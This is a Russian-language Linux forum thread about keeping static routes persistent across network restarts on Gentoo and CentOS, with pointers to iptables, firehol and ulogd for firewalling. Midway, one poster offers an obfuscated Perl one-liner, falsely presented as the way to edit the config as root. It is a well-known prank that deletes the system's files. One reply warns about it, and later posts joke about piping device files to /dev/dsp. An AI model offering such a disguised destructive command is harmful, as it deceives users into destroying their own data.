Каморка

1. Простой вопрос - как задать статический маршрут, чтобы он был постоянным? (загружался сам при старте network) - уже пробовал писать в файл route-eth0 и команды для route и описание маршрута, но не работает.
2. А можно примерчик приличного файрвола? to CdR - признаю, что lokkit подлходит только для простецких файрволов. Сейчас хочется понавороченнее - чтобы всякие левые пакеты отвергал, попытки атак и т.д.

1. -- в разныъ дистрах используются несколько разные скрипты для старта. Так что в мануал заглянуть всё равно придётся.
в gentoo это /etc/conf.d/net
в котором указывается что-то типа:
config_eth0=( "xxx.xxx.xxx.xxx/xx" )
routes_eth0=( "default via xxx.xxx.xxx.xxx" )

2. -- хез. мне iptables хватает.

CdR писал(а):1. -- в разныъ дистрах используются несколько разные скрипты для старта. Так что в мануал заглянуть всё равно придётся.
в gentoo это /etc/conf.d/net
в котором указывается что-то типа:
config_eth0=( "xxx.xxx.xxx.xxx/xx" )
routes_eth0=( "default via xxx.xxx.xxx.xxx" )

Ну вот по мануалу то и не получается... у меня КопеечнаяОС. лана будем копать... То ли дело Винды! приписал сбоку -p и все!

CdR писал(а): 2. -- хез. мне iptables хватает.

Вот! Заходим в iptables-config, ставим сохранять при рестарте, рестартуем и файлик сохраненный в студию!

Stanislav писал(а):Вот! Заходим в iptables-config

не держим

вот так в линухах под рутом конфиг правится

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

white_raven писал(а):вот так в линухах под рутом конфиг правится

cat "test... test... test..." | perl -e '$??s......'

Злые вы, а вдруг кто запустит?

white_raven писал(а):вот так в линухах под рутом конфиг правится

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

p.s. пытался найти похожий (по читаемости) код на С, который после компилирования играет музыку.. но что-то не нахожу..

good old music

cat /dev/mouse > /dev/dsp
or
cat /boot/kernel > /dev/dsp

white_raven писал(а):good old music

cat /dev/mouse > /dev/dsp
or
cat /boot/kernel > /dev/dsp

кукушку забыл

Stanislav писал(а):1...
2. А можно примерчик приличного файрвола? to CdR - признаю, что lokkit подлходит только для простецких файрволов. Сейчас хочется понавороченнее - чтобы всякие левые пакеты отвергал, попытки атак и т.д.

сюда глянь
http://firehol.sourceforge.net/
Ну дюже приятный скрипт.

Также, полезна такая штука как ulogd для отладки/регистрации пакетов,
чтобы логи системные не забивать.

2 Stanislav
в rc.local или rc.sysinit вставь маршрут, или в /etc/static-routes , если есть поддержка
в http://www.opennet.ru найди список ловушек левых пакетов (пинги, ддосы etc.) и спаммеров, там постоянно обновляется

mpako6ec писал(а):2 Stanislav
в rc.local или rc.sysinit вставь маршрут, или в /etc/static-routes , если есть поддержка
в http://www.opennet.ru найди список ловушек левых пакетов (пинги, ддосы etc.) и спаммеров, там постоянно обновляется

в rc.* работает, но только при рестарте сервера, а не при рестарте network; static-routes, route-eth0 не работает

Stanislav писал(а): в rc.* работает, но только при рестарте сервера, а не при рестарте network; static-routes, route-eth0 не работает

этот документ читали?

может там при установке что-то прописано было в другие скрипты и теперь при рестарте жта настройка имеет приоритет перед тем, что добавляется в static-routes, route-eth0 & etc? GUI такие вещи должен сам отслеживать, а если менять руками, то надо знать как оно всё работает шаг за шагом.

Плохо помню как там всё устроено, но вроде как рестартом eth0 занимается скрипт /etc/sysconfig/network-scripts/ifup-eth, который читает настройки из /etc/sysconfig/network-scripts/ifcfg-eth0. Там можно прописать настройки GATEWAY. Будут ли они переписывать -- не знаю.

btw: насколько я вижу, network (CentOS 5.1, file: /etc/init.d/network) при старте ищет и _добавляет_ routes из /etc/sysconfig/static-routes, а _не_ /etc/static-routes.

2 Stanislav: даааа, в винде толи дело, две сетевухи поставишь, пропишешь, и кирдык роутингу :-\
втыкай в network свой скрипт на маршруты(в Ubuntu networking)